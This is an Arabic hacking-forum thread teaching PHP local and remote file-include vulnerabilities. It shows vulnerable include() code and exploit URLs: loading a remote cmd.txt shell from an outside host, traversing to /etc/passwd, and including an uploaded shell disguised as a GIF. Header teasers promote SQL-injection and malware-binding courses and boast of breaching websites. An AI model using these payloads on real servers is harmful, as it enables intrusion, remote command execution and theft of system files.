1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

درس ما هي ثغرات الفايل انكلود - File Include

الموضوع في 'آمن المواقع والسيرفرات' بواسطة 0ne-Tw0, بتاريخ ‏2 فبراير 2013.

كاتب الموضوع : 0ne-Tw0 المشاهدات : 341 الردود : 4 ‏2 فبراير 2013
  1. غير متصل

    0ne-Tw0
    rank
    Developer

    عضو منذ:
    ‏14 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    اللهم لا علم لنا الا ماعلمتنا , اللهم علمنا ماينفعنا وانفعنا بما علمتنا انك انت العليم الحكيم.

    بسم الله الرحمن الرحيم

    اليوم درسنا راح يتكلم
    ثغرات الفايل انكلود

    ما هي ثغرات الفايل انكلود - File Include

    هذه الثغرات عبارة عن تطبيق اكواد عبر ادخال ملفات باستخدام دوال معينة تكون مستخدمة بالسكربت لتطبيق اوامر اخرى ..

    الدوال التي يمكن استغلالها لتطبيق الفايل انكلود

    كود PHP:
    include
    require
    include_once
    require_once
    ما هو عمل هذه الدوال

    هذه الدوال تقوم بتطبيق محتوي ملف معين كملف برمجي ..
    اي ادخال الاكواد من ملفات خارجية .. ولا يخلى اي سكريبت من احد هذه الدوال
    ولكن تكون الثغرة في استخدام المتغيرات داخل هذه الدوال وامكانية التعديل على المتغير

    انواع ثغرات ال File include

    هذا النوع ينقسم الى قسمين :

    1 - Remote File Include :
    وهو عملية تطبيق كود من ملف اي ملف وليس بالشرط ان يكون على نفس السيرفر .. اي يمكن تطبيق اكواد اي ملف اخر .. دون اي مشاكل

    2 - Local File include :
    وهي امكانية تطبيق كود اي ملف اخر من على نفس السيرفر
    كيف يتم اكتشاف ثغرات الفايل انكلود ؟
    طبعا لكي تكتشف ثغرات الفايل انكلود يجب عليك البحث بالشفرة المصدرية او الكود للسكربتات ..
    وهذا الكود مثال على ثغرات الفايل انكلود

    كود PHP:
    <?php
    $page 
    $_GET['page'];
    include (
    $page);
    ?>
    وفي هذه الحالة يتم تطبيق الثغرة بكل سهولة على الملف باستخدام المتغير page
    ففي هذه الحالة يكون الاستغلال مثلا

    كود PHP:
    file.php?page=shell.txt
    او اي ملف اخر مثلا

    كود PHP:
    file.php?page=http://members.lycos.co.uk/soqor10/cmd.txt&cmd=id
    اما لو كان الكود مثلا :

    كود PHP:
    <?php
    $page 
    $_GET['page'];
    include (
    "./pages/$page");
    ?>
    فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر
    وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات
    مثلا لو كان مسار الملف

    كود PHP:
    /home/user/public_html/file.php
    يكون الاستغلال للوصول لل /etc/passwd

    كود PHP:
    file.php?page=../../../../etc/passwd
    او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر
    واكن مسار الملف

    كود PHP:
    /home/upload/public_html/uploads/file01c144dd.gif
    تدخله بالطريقة التالية :

    كود PHP:
    file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif
    وطبعا هذا النوع من الثغرات يعتمد بشكل رئيسي على القدرة على قراءة الاكواد والصبر .!!:{

    الى هنا ينتهي درسنا اتمنى ان تكونو قد استفدتم من الدرس
     


    جاري تحميل الصفحة...
  2. غير متصل

    AL.MaX
    rankrank
    Developer

    عضو منذ:
    ‏22 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    HaCkEr
    الإقامة:

    رد: درس ما هي ثغرات الفايل انكلود - File Include

    السلام عليكم ورحمه الله وبركاته

    يعطيك ألف عافيه اخي درس رائع وسلس i:q^:
     


  3. غير متصل

    MR ! HЄRO
    rank
    Developer

    عضو منذ:
    ‏18 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: درس ما هي ثغرات الفايل انكلود - File Include

    مبدع ومشكور على الطرح الرائع
     


  4. غير متصل

    عُبْدُالـڔבـَمَڼ
    rank
    Developer

    عضو منذ:
    ‏29 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    |[ HacKeR - Security - Hacking Software ]|
    الإقامة:

    رد: درس ما هي ثغرات الفايل انكلود - File Include

    الله يعطيك الف عافيه :{1}:​
     


  5. غير متصل

    0ne-Tw0
    rank
    Developer

    عضو منذ:
    ‏14 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: درس ما هي ثغرات الفايل انكلود - File Include

    حياكم الله اخواني &:":
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...